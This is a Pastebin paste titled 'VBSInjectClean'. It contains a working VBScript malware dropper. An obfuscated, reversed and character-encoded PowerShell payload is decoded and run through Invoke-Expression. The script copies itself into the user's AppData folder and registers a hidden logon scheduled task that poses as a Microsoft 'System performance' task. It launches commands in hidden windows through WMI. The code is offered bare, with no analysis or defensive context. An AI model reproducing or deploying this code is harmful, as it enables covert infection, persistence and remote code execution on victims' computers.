jccdt

VBSInjectClean

Jul 1st, 2019
351
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.23 KB | None | 0 0
  1. f="XEI|)OLOL$(gnirtSteG.IICSA::]gnidocnE.txeT.metsyS[;)14,201,63,44,93,101,021,101,64,901,511,56,301,101,28,93,04,101,021,101,85,85,39,211,711,611,501,701,99,79,27,64,701,19,95,88,96,37,421,14,93,021,84,93,44,93,64,64,93,04,101,99,79,801,211,101,411,64,14,93,301,211,601,64,94,84,101,801,711,001,111,901,74,411,89,64,901,111,99,64,111,811,111,211,111,001,111,611,501,411,301,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,201,63,39,39,19,101,611,121,66,19,95,88,96,37,421,14,93,301,211,601,64,79,201,101,411,79,48,101,211,901,711,28,74,411,89,64,901,111,99,64,111,811,111,211,111,001,111,611,501,411,301,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,601,201,63,95,14,93,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,93,04,101,901,79,87,801,79,501,611,411,79,08,401,611,501,78,001,79,111,67,85,85,39,121,801,89,901,101,511,511,56,64,011,111,501,611,99,101,801,201,101,28,64,901,101,611,511,121,38,19,23,39,001,501,111,811,19(@=OLOL$"
  2. exec(replace("Pow%rsh%ll","%","e")+space(1)+StrReverse(f))
  3. N="SysWord"
  4. set fso0 = CreateObject("Scripting.FileSystemObject")
  5. CurrentDirectory = fso0.GetParentFolderName(WScript.ScriptFullName)
  6. sname= wsh.scriptname
  7. startupfolder="C:\Users\"+CreateObject("WScript.Network").UserName+"\AppData\Roaming"
  8. F=startupfolder+ "\" + sname
  9.  
  10. task F,N
  11. if CurrentDirectory = startupfolder Then
  12.  
  13. WScript.Quit()
  14. else
  15.  
  16. mnb()
  17. End if
  18.  
  19. sub mnb()
  20.  
  21.  
  22. If (fso0.FileExists(CurrentDirectory+ "\"+ sname)) Then
  23. sSourceFile = CurrentDirectory+ "\"+ sname
  24.  
  25. sCmd = "cmd /c copy """ & sSourceFile & """ """ & startupfolder & """ /Y"
  26. exec(sCmd)
  27.  
  28. WScript.Quit()
  29. Else
  30. WScript.Quit()
  31. End If
  32.  
  33. End sub
  34.  
  35. sub task(PATH,TSname)
  36.  
  37. dim strUser
  38. strUser = CreateObject("WScript.Network").UserName
  39. Dim service
  40. Set service = CreateObject(StrReverse("ecivreS.eludehcS"))
  41. call service.Connect()
  42. Dim rootFolder
  43. Set rootFolder = service.GetFolder("\")
  44. Dim taskDefinition
  45. Set taskDefinition = service.NewTask(0)
  46. ' taskDefinition.principal.LogonType = 3
  47. Dim regInfo
  48. Set regInfo = taskDefinition.RegistrationInfo
  49. regInfo.Description = "System performance enhancment"
  50. regInfo.Author = "Microsoft"
  51. Dim settings
  52. Set settings = taskDefinition.Settings
  53. settings.Enabled = True
  54. settings.StartWhenAvailable = True
  55. settings.Hidden = True
  56. settings.DisallowStartIfOnBatteries = False
  57.  
  58. const TriggerTypeLogon = 9
  59. Dim triggers
  60. Set triggers = taskDefinition.Triggers
  61. Dim trigger
  62. Set trigger = triggers.Create(TriggerTypeLogon)
  63. Dim startTime, endTime
  64. startTime = "2010-05-02T10:49:02"
  65. endTime = "2060-05-02T10:52:02"
  66. trigger.Id = "LogonTriggerId"
  67. trigger.UserId = strUser
  68. trigger.StartBoundary = startTime
  69. trigger.EndBoundary = endTime
  70. trigger.Enabled = True
  71. const ActionTypeExecutable = 0
  72. Dim Action
  73. Set Action = taskDefinition.Actions.Create( ActionTypeExecutable )
  74. Action.Path = PATH
  75. const createOrUpdateTask = 6
  76. call rootFolder.RegisterTaskDefinition( _
  77. TSname, taskDefinition, createOrUpdateTask, _
  78. , , 3)
  79.  
  80. End sub
  81. sub exec(Atc)
  82. strCommand = Atc
  83. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  84. Set objStartup = objWMIService.Get("Win32_ProcessStartup")
  85. Set objConfig = objStartup.SpawnInstance_
  86. objConfig.ShowWindow = 0
  87. Set objProcess = objWMIService.Get("Win32_Process")
  88. intReturn = objProcess.Create(strCommand, Null, objConfig, intProcessID)
  89. End sub
Add Comment
Please, Sign In to add comment